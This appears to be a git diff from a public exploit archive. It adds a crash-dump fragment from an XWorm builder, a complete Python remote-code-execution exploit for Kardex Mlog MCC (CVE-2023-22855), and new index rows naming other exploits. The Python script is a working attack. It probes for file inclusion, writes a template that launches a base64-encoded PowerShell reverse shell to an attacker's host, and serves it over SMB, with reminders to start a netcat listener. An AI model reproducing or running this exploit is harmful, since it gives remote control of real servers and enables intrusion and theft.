00000000 mscorlib_ni! +0113ea08 721184f4     00000000 00000000 00000000 mscorlib_ni! +0113ea24 6e14bdfa     00000000 00000000 00000000 mscorlib_ni! +0113ea40 6e14bb9a     00000000 00000000 00000000 System_Windows_Forms_ni! +0113ea80 6e13b07f     00000000 00000000 00000000 System_Windows_Forms_ni! +0113eacc 6e144931     00000000 00000000 00000000 System_Windows_Forms_ni! +0113ead8 6e1445f7     00000000 00000000 00000000 System_Windows_Forms_ni! +0113eaec 6e13af53     00000000 00000000 00000000 System_Windows_Forms_ni! +0113eaf4 6e13aee5     00000000 00000000 00000000 System_Windows_Forms_ni! +0113eb08 6e13a820     00000000 00000000 00000000 System_Windows_Forms_ni! +0113eb58 0146d08e     00000000 00000000 00000000 System_Windows_Forms_ni! +WARNING: Frame IP not in any known module. Following frames may be wrong. +0113eb8c 7650148b     000606f4 0000c250 00000000 0x146d08e +0113ebb8 764f844a     05823e56 000606f4 0000c250 USER32!_InternalCallWinProc+0x2b +0113ec9c 764f61ba     05823e56 00000000 0000c250 USER32!UserCallWinProcCheckWow+0x33a +0113ed10 764f5f80     0113ed98 0113ed58 6e19e5ed USER32!DispatchMessageWorker+0x22a +0113ed1c 6e19e5ed     0113ed98 c9b28348 731410fc USER32!DispatchMessageW+0x10 +0113ed58 6e14b44f     00000000 00000000 00000000 System_Windows_Forms_ni+0x22e5ed +0113eddc 6e14b03d     00000000 00000000 00000000 System_Windows_Forms_ni! +0113ee30 6e14ae93     00000000 00000000 00000000 System_Windows_Forms_ni! +0113ee5c 014b2694     00000000 00000000 00000000 System_Windows_Forms_ni! +0113ee84 014b2211     00000000 00000000 00000000 0x14b2694 +0113eeac 014b1871     00000000 00000000 00000000 0x14b2211 +0113eef8 014b08b7     00000000 00000000 00000000 0x14b1871 +0113ef28 73140556     00000000 00000000 00000000 builder!XWorm.My.MyApplication.Main+0x6f +0113ef34 7314373a     0113efc4 0113ef78 732dd3f0 clr!CallDescrWorkerInternal+0x34 +0113ef88 73149adb     00000000 030622ec 73171e90 clr!CallDescrWorkerWithHandler+0x6b +0113eff0 732bff7b     0113f0cc c8874202 01466f94 clr!MethodDescCallSite::CallTargetWorker+0x16a +0113f114 732c065a     0113f158 00000000 c8874096 clr!RunMain+0x1b3 +0113f380 732c0587     00000000 c8874b72 00700000 clr!Assembly::ExecuteMainMethod+0xf7 +0113f864 732c0708     c8874baa 00000000 00000000 clr!SystemDomain::ExecuteMainMethod+0x5ef +0113f8bc 732c082e     c8874bea 00000000 732bc210 clr!ExecuteEXE+0x4c +0113f8fc 732bc235     c8874a2e 00000000 732bc210 clr!_CorExeMainInternal+0xdc +0113f938 7398fa84     84112dff 73a24330 7398fa20 clr!_CorExeMain+0x4d +0113f970 73a1e81e     73a24330 73980000 0113f998 mscoreei!_CorExeMain+0xd6 +0113f980 73a24338     73a24330 76b600f9 00f94000 MSCOREE!ShellShim__CorExeMain+0x9e +0113f998 76b600f9     00f94000 76b600e0 0113f9f4 MSCOREE!_CorExeMain_Exported+0x8 +0113f998 77997bbe     00f94000 3d39c64a 00000000 KERNEL32!BaseThreadInitThunk+0x19 +0113f9f4 77997b8e     ffffffff 779b8d3f 00000000 ntdll!__RtlUserThreadStart+0x2f +0113fa04 00000000     00000000 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b + + +STACK_COMMAND:  ~0s ; .cxr ; kb + +SYMBOL_NAME:  builder!XWorm.Client.isDisconnected+a9 + +MODULE_NAME: builder + +IMAGE_NAME:  builder.exe + +FAILURE_BUCKET_ID:  NULL_POINTER_READ_c0000005_builder.exe!XWorm.Client.isDisconnected + +OS_VERSION:  10.0.19041.1 + +BUILDLAB_STR:  vb_release + +OSPLATFORM_TYPE:  x86 + +OSNAME:  Windows 10 + +IMAGE_VERSION:  2.1.0.0 + +FAILURE_ID_HASH:  {ab0d02c5-881b-c628-2858-a241c5c41b1f} + +Followup:     MachineOwner +--------- + +TS: Exploitable - Data from Faulting Address controls Code Flow starting at builder!XWorm.Client.isDisconnected+0x00000000000000a9 (Hash=0xc8c3bc2d.0x7badd95a) \ No newline at end of file diff --git a/exploits/windows/remote/51239.py b/exploits/windows/remote/51239.py new file mode 100755 index 000000000..035d40443 --- /dev/null +++ b/exploits/windows/remote/51239.py @@ -0,0 +1,106 @@ +#!/usr/bin/env python3 + +# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) +# Date: 12/13/2022 +# Exploit Author: Patrick Hener +# Vendor Homepage: https://www.kardex.com/en/mlog-control-center +# Version: 5.7.12+0-a203c2a213-master +# Tested on: Windows Server 2016 +# CVE : CVE-2023-22855 +# Writeup: https://hesec.de/posts/CVE-2023-22855 +# +# You will need to run a netcat listener beforehand: ncat -lnvp +# +import requests, argparse, base64, os, threading +from impacket import smbserver + +def probe(target): + headers = { + "Accept-Encoding": "deflate" + } + res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers) + if "fonts" in res.text: + return True + else: + return False + +def gen_payload(lhost, lport): + rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()' + rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE')) + payload = f"""<#@ template language="C#" #> +<#@ Import Namespace="System" #> +<#@ Import Namespace="System.Diagnostics" #> +<# +var proc1 = new ProcessStartInfo(); +string anyCommand; +anyCommand = "powershell -e {rev_shell_blob_b64.decode()}"; +proc1.UseShellExecute = true; +proc1.WorkingDirectory = @"C:\Windows\System32"; +proc1.FileName = @"C:\Windows\System32\cmd.exe"; +proc1.Verb = "runas"; +proc1.Arguments = "/c "+anyCommand; +Process.Start(proc1); +#>""" + + return payload + +def start_smb_server(lhost): + server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445) + server.addShare("SHARE", os.getcwd(), '') + server.setSMB2Support(True) + server.setSMBChallenge('') + server.start() + +def trigger_vulnerability(target, lhost): + headers = { + "Accept-Encoding": "deflate" + } + + requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers) + +def main(): + # Well, args + parser = argparse.ArgumentParser() + parser.add_argument('-t', '--target', help='Target host url', required=True) + parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True) + parser.add_argument('-p', '--lport', help='Attacker listening port', required=True) + args = parser.parse_args() + + # Probe if target is vulnerable + print("[*] Probing target") + if probe(args.target): + print("[+] Target is alive and File Inclusion working") + else: + print("[-] Target is not alive or File Inclusion not working") + exit(-1) + + # Write payload to file + print("[*] Writing 'exploit.t4' payload to be included later on") + with open("exploit.t4", 'w') as template: + template.write(gen_payload(args.lhost, args.lport)) + + template.close() + + # Start smb server in background + print("[*] Starting SMB Server in the background") + smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,)) + smb_server_thread.start() + + # Rev Shell reminder + print("[!] At this point you should have spawned a rev shell listener") + print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'") + print("[?] Are you ready to trigger the vuln? Then press enter!") + input() # Wait for input then continue + + # Trigger vulnerability + print("[*] Now triggering the vulnerability") + trigger_vulnerability(args.target, args.lhost) + + # Exit + print("[+] Enjoy your shell. Bye!") + os._exit(1) + + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ded6d4760..8b4eac6da 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -2892,6 +2892,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,,2018-02-28,2018-02-28,0,CVE-2016-1887,,,,,https://cturt.github.io/sendmsg.html 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb +51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-05,0,CVE-2023-0744,,,,, 7060,exploits/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,dos,hardware,,2008-11-07,,1,OSVDB-60243;CVE-2008-6605;OSVDB-49835,,,,, 2246,exploits/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,dos,hardware,,2006-08-21,,1,OSVDB-28171;CVE-2009-3962;CVE-2006-4523,,,,, 10182,exploits/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,dos,hardware,,2009-10-28,,1,,,,,,http://secunia.com/advisories/21583 @@ -3489,6 +3490,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38720,exploits/hardware/remote/38720.txt,"D-Link DIR-817LW - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130399,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060 38719,exploits/hardware/remote/38719.txt,"D-Link DIR-818W - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060 38718,exploits/hardware/remote/38718.txt,"D-Link DIR-825 (vC) - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130403,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060 +51243,exploits/hardware/remote/51243.txt,"D-Link DIR-846 - Remote Command Execution (RCE) vulnerability",2023-04-05,"Françoa Taffarel",remote,hardware,,2023-04-05,2023-04-05,0,CVE-2022-46552,,,,, 38481,exploits/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",remote,hardware,,2013-04-19,2015-10-18,1,CVE-2013-3095;OSVDB-92550,,,,,https://www.securityfocus.com/bid/59312/info 38717,exploits/hardware/remote/38717.txt,"D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060 38725,exploits/hardware/remote/38725.txt,"D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",remote,hardware,80,2015-11-16,2015-11-16,0,OSVDB-130405;OSVDB-130400,,,,,http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060 @@ -3511,6 +3513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 15842,exploits/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",remote,hardware,,2010-12-29,2011-09-18,1,OSVDB-70230,,,,, 9209,exploits/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,remote,hardware,,2009-07-19,2016-10-27,1,OSVDB-57143;CVE-2009-2766;CVE-2009-2765;OSVDB-55990;CVE-2008-6975;OSVDB-55636;CVE-2008-6974,,,,, 7389,exploits/hardware/remote/7389.html,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",remote,hardware,,2008-12-07,,1,CVE-2008-6975;CVE-2008-6974;OSVDB-55636,,,,, +51248,exploits/hardware/remote/51248.py,"Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure",2023-04-05,"Ken Pyle",remote,hardware,,2023-04-05,2023-04-05,0,CVE-2020-5330;CVE-2019-15993,,,,, 50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,, 50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,, 50879,exploits/hardware/remote/50879.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,, @@ -3857,6 +3860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 38583,exploits/hardware/remote/38583.html,"Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,remote,hardware,,2013-06-12,2015-10-31,1,CVE-2013-3539;OSVDB-94226,,,,,https://www.securityfocus.com/bid/60529/info 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,,2020-10-01,2020-10-01,0,,,,,, 44196,exploits/hardware/remote/44196.md,"Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' 'setAttributeNodeNS' WebKit 5.02 / 'bpf' Kernel Loader 4.55",2018-02-27,Specter,remote,hardware,,2018-02-28,2018-04-25,0,,Console,,,,https://github.com/Cryptogenic/PS4-4.55-Kernel-Exploit/tree/bb0dfe821d94cb03491b0d4c5136cefd1624fc41 +51259,exploits/hardware/remote/51259.txt,"SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow",2023-04-05,LiquidWorm,remote,hardware,,2023-04-05,2023-04-05,0,,,,,, 7055,exploits/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Configuration Download",2008-11-07,hkm,remote,hardware,,2008-11-06,,1,OSVDB-49870;CVE-2008-6916,,,,, 33938,exploits/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Cross-Site Scripting",2010-02-04,"Karn Ganeshen",remote,hardware,,2010-02-04,2014-07-01,1,CVE-2010-0607;OSVDB-62211,,,,,https://www.securityfocus.com/bid/39928/info 29666,exploits/hardware/remote/29666.rb,"Supermicro Onboard IPMI - 'close_window.cgi' Remote Buffer Overflow (Metasploit)",2013-11-18,Metasploit,remote,hardware,80,2013-11-18,2013-11-18,1,CVE-2013-3623;OSVDB-99598,"Metasploit Framework (MSF)",,,, @@ -5370,6 +5374,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 36436,exploits/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",webapps,java,,2015-03-19,2015-03-19,0,CVE-2015-0514;OSVDB-117348,,,,, 36440,exploits/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",webapps,java,58080,2015-03-19,2015-03-19,0,CVE-2015-0516;OSVDB-117349,,,,, 44691,exploits/java/webapps/44691.txt,"ERPnext 11 - Cross-Site Scripting",2018-05-22,"Veerababu Penugonda",webapps,java,,2018-05-22,2018-05-22,0,CVE-2018-11339,,,,, +51255,exploits/java/webapps/51255.txt,"ERPNext 12.29 - Cross-Site Scripting (XSS)",2023-04-05,"Patrick Dean Ramos / Nathu Nandwani / Junnair Manla",webapps,java,,2023-04-05,2023-04-05,0,CVE-2022-28598,,,,, 48654,exploits/java/webapps/48654.txt,"Exhibitor Web UI 1.7.1 - Remote Code Execution",2020-07-07,"Logan Sanderson",webapps,java,,2020-07-09,2020-10-01,0,CVE-2019-5029,,,,, 26987,exploits/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,webapps,java,,2005-12-27,2013-07-21,1,CVE-2005-4576;OSVDB-21936,,,,,https://www.securityfocus.com/bid/16073/info 50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",2021-07-16,Photubias,webapps,java,,2021-07-16,2021-10-29,0,CVE-2021-35464,,,,, @@ -5418,6 +5423,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35683,exploits/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting",2011-05-02,"Patrick Webster",webapps,java,,2011-05-02,2015-01-03,1,,,,,,https://www.securityfocus.com/bid/47672/info 47972,exploits/java/webapps/47972.txt,"Liferay CE Portal 6.0.2 - Remote Command Execution",2020-01-29,"Berk Dusunur",webapps,java,,2020-01-29,2020-01-29,0,,,,,, 18881,exploits/java/webapps/18881.txt,"Liferay Portal 6.0.x < 6.1 - Privilege Escalation",2012-05-13,"Jelmer Kuperus",webapps,java,,2012-05-15,2012-05-15,0,OSVDB-82028,,,,, +51244,exploits/java/webapps/51244.py,"Liferay Portal 6.2.5 - Insecure Permissions",2023-04-05,Fu2x2000,webapps,java,,2023-04-05,2023-04-05,0,CVE-2021-33990,,,,, 44945,exploits/java/webapps/44945.txt,"Liferay Portal < 7.0.4 - Server-Side Request Forgery",2018-06-26,"Mehmet Ince",webapps,java,80,2018-06-26,2018-06-26,0,,"Cross-Site Request Forgery (CSRF)",,,, 44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java,,2018-02-12,2018-02-12,0,,,,,, 44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java,,2018-02-12,2018-02-12,0,,,,,, @@ -6975,6 +6981,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47703,exploits/linux/local/47703.txt,"GNU Mailutils 3.7 - Privilege Escalation",2019-11-21,"Mike Gualtieri",local,linux,,2019-11-21,2019-11-21,0,CVE-2019-18862,,,,, 41154,exploits/linux/local/41154.sh,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-25,"Xiphos Research Ltd",local,linux,,2017-01-25,2017-01-25,1,,,screenroot.sh,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-25-at-220348.png,http://www.exploit-db.comscreen-4.5.0.tar.gz, 41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",local,linux,,2017-01-25,2018-01-18,1,,,,,http://www.exploit-db.comscreen-4.5.0.tar.gz,https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html +51252,exploits/linux/local/51252.py,"GNU screen v4.9.0 - Privilege Escalation",2023-04-05,"Manuel Andreas",local,linux,,2023-04-05,2023-04-05,0,CVE-2023-24626,,,,, 479,exploits/linux/local/479.c,"GNU Sharutils 4.2.1 - Local Format String",2004-09-25,n4rk0tix,local,linux,,2004-09-24,2016-03-30,1,OSVDB-10255,,,,http://www.exploit-db.comsharutils-4.2.1.tar.gz, 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,,2018-05-09,2018-05-09,0,CVE-2018-0494,,,,,http://seclists.org/fulldisclosure/2018/May/20 3154,exploits/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,local,linux,,2007-01-17,2011-09-15,1,OSVDB-33551;CVE-2007-0368,,,,http://www.exploit-db.commbsebbs-0.70.0.tar, @@ -9235,6 +9242,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 8842,exploits/multiple/dos/8842.pl,"Apache mod_dav / svn - Remote Denial of Service",2009-06-01,kingcope,dos,multiple,,2009-05-31,,1,OSVDB-55057;CVE-2009-1955,,,,, 21575,exploits/multiple/dos/21575.txt,"Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",dos,multiple,,2002-06-22,2016-09-08,1,CVE-2002-0653;OSVDB-842,,,,,https://www.securityfocus.com/bid/5084/info 37487,exploits/multiple/dos/37487.txt,"Apache Sling - Denial of Service",2012-07-06,IOactive,dos,multiple,,2012-07-06,2015-07-04,1,CVE-2012-2138;OSVDB-83682,,,,,https://www.securityfocus.com/bid/54341/info +51262,exploits/multiple/dos/51262.py,"Apache Tomcat 10.1 - Denial Of Service",2023-04-05,"Cristian Giustini",dos,multiple,,2023-04-05,2023-04-05,0,CVE-2022-29885,,,,, 41668,exploits/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",dos,multiple,,2017-03-22,2017-04-20,0,CVE-2017-6192,,,,http://www.exploit-db.comapngdis-2.8-bin-linux.zip, 41670,exploits/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow (PoC)",2017-03-14,"Alwin Peppels",dos,multiple,,2017-03-22,2017-03-22,0,CVE-2017-6191,,,,http://www.exploit-db.comapngdis-2.8-bin-linux.zip, 41669,exploits/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",dos,multiple,,2017-03-22,2017-04-20,0,CVE-2017-6193,,,,http://www.exploit-db.comapngdis-2.8-bin-linux.zip, @@ -11169,6 +11177,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 33653,exploits/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 - 'reloadFrame' Cross-Site Scripting",2010-02-18,"George Christopoulos",remote,multiple,,2010-02-18,2014-06-06,1,CVE-2010-0703;OSVDB-62482,,,,,https://www.securityfocus.com/bid/38308/info 46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432,2019-05-08,2019-05-08,1,CVE-2019-9193,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb 50847,exploits/multiple/remote/50847.py,"PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)",2022-03-30,b4keSn4ke,remote,multiple,,2022-03-30,2022-03-30,0,CVE-2019–9193,,,,, +51247,exploits/multiple/remote/51247.py,"PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)",2023-04-05,"Paulo Trindade",remote,multiple,,2023-04-05,2023-04-05,0,CVE-2019–9193,,,,, 23385,exploits/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",remote,multiple,,2003-11-17,2012-12-14,1,OSVDB-2824,,,,,https://www.securityfocus.com/bid/9055/info 8037,exploits/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,remote,multiple,,2009-02-09,2016-10-27,1,OSVDB-51953;CVE-2009-0543;OSVDB-51849;CVE-2009-0542,,,,, 32798,exploits/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection",2009-02-10,AlpHaNiX,remote,multiple,,2009-02-10,2014-04-11,1,CVE-2009-0542;OSVDB-51953,,,,,https://www.securityfocus.com/bid/33722/info @@ -11544,6 +11553,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48649,exploits/multiple/webapps/48649.txt,"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation",2020-07-07,"William Summerhill",webapps,multiple,,2020-07-07,2020-07-07,0,CVE-2020-14945,,,,, 48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,,2020-07-14,2020-07-14,0,CVE-2020-14946,,,,, 48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,,2020-06-24,2020-06-24,0,CVE-2020-14943,,,,, +51254,exploits/multiple/webapps/51254.txt,"BTCPay Server v1.7.4 - HTML Injection.",2023-04-05,"Manojkumar J",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-0493,,,,, 31647,exploits/multiple/webapps/31647.txt,"CA 2E Web Option 8.1.2 - Authentication Bypass",2014-02-13,"Mike Emery",webapps,multiple,,2014-02-13,2014-02-13,0,CVE-2014-1219;OSVDB-103236,,,,,http://portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1219/ 48791,exploits/multiple/webapps/48791.txt,"Cabot 0.11.12 - Persistent Cross-Site Scripting",2020-09-07,"Abhiram V",webapps,multiple,,2020-09-07,2020-09-07,0,,,,,, 48144,exploits/multiple/webapps/48144.py,"Cacti 1.2.8 - Authenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/4877c2b2f378ce5937f56b259b69b02840514d4c/Cacti-postauth-rce.py @@ -11971,6 +11981,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,,2021-08-26,2021-08-26,0,,,,,, 9728,exploits/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,webapps,multiple,,2009-09-20,,1,OSVDB-58298;CVE-2009-3324,,,,, 35219,exploits/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",webapps,multiple,,2014-11-17,2014-11-17,0,OSVDB-114840;CVE-2014-9237,,,,, +51264,exploits/multiple/webapps/51264.txt,"Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)",2023-04-05,"Andreas Finstad",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-23286,,,,, 12730,exploits/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,webapps,multiple,,2010-05-23,,1,,,,,, 28340,exploits/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",webapps,multiple,,2006-08-03,2017-10-17,1,CVE-2006-4068;OSVDB-29777,,,,,https://www.securityfocus.com/bid/19333/info 47297,exploits/multiple/webapps/47297.rb,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)",2019-08-21,"Alyssa Herrera",webapps,multiple,,2019-08-21,2019-08-21,0,CVE-2019-11510,,,,, @@ -12006,6 +12017,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,, 49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,, 49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,, +51237,exploits/multiple/webapps/51237.txt,"Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)",2023-04-05,"RedTeam Pentesting GmbH",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-0214,,,,, 41877,exploits/multiple/webapps/41877.txt,"SedSystems D3 Decimator - Multiple Vulnerabilities",2016-01-11,prdelka,webapps,multiple,9784,2017-04-13,2017-04-13,0,,,,,,https://github.com/HackerFantastic/Public/blob/d1d3a421ba42ba476b0c23a3a09889a6cf1ee7a4/exploits/d3_decimator.txt 49452,exploits/multiple/webapps/49452.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution",2021-01-22,LiquidWorm,webapps,multiple,,2021-01-22,2021-01-22,0,,,,,, 34000,exploits/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Cross-Site Scripting",2010-01-18,indoushka,webapps,multiple,,2010-01-18,2014-07-08,1,,,,,,https://www.securityfocus.com/bid/40236/info @@ -12594,6 +12606,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 23311,exploits/php/dos/23311.txt,"E107 - 'Chatbox.php' Denial of Service",2003-10-29,Blademaster,dos,php,,2003-10-29,2012-12-11,1,CVE-2003-1191;OSVDB-2753,,,,,https://www.securityfocus.com/bid/8930/info 6481,exploits/php/dos/6481.c,"Femitter FTP Server 1.03 - 'RETR' Remote Denial of Service (PoC)",2008-09-17,LiquidWorm,dos,php,,2008-09-16,2017-04-20,1,CVE-2008-2032;OSVDB-44612,,,,http://www.exploit-db.comfem-dist.exe, 